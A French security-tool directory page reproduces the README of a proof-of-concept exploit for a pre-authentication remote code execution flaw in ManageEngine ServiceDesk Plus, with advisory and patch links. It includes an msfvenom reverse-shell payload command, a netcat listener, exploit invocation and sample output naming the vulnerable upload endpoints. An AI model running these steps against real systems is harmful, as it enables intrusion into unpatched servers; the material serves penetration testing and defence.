Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44077 — Exploit de preuve de concept pour une RCE PreAuth dans ManageEngine ServiceDesk Plus (CVE-2021-44077). Téléverse et exécute des exécutables Windows arbitraires sur des cibles vulnérables. | Kitploit
Outils/GitHubGitHub/horizon3ai/cve-2021-44077
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

Exploit de preuve de concept pour une RCE PreAuth dans ManageEngine ServiceDesk Plus (CVE-2021-44077). Téléverse et exécute des exécutables Windows arbitraires sur des cibles vulnérables.

Voir le dépôt
3692il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44077

Preuve de concept d'exploitation pour CVE-2021-44077 : RCE PreAuth dans ManageEngine ServiceDesk Plus < 11306

Basé sur :

  • https://xz.aliyun.com/t/10631

Avis CISA :

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Correctif (mettre à jour vers le build 11306 ou une version ultérieure) :

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

Testé sur ManageEngine ServiceDesk Plus Build 11303. Tous les antivirus désactivés.

Utilisation

L'exploit téléverse un exécutable Windows sur la cible et l'exécute.

Pour exploiter la vulnérabilité, générez d'abord un exécutable. Par exemple :

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

Installez le fichier requirements avec pip install ou assurez-vous de disposer du package requests.

Si vous essayez de récupérer un reverse shell, lancez d'abord votre listener, par exemple :

root@kitploit:~
nc -l 4444

Exécutez ensuite le script d'exploitation en passant les arguments url et exe, par exemple :

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

Exemple de sortie du script :

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

Notes sur l'exploit

  • La vulnérabilité permet de téléverser n'importe quel fichier dans le répertoire bin d'installation, y compris des fichiers existants tels que des scripts batch. Il peut exister d'autres moyens d'invoquer le fichier téléversé.
  • Le téléversement direct d'un web shell semble être bloqué par un filtre.

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil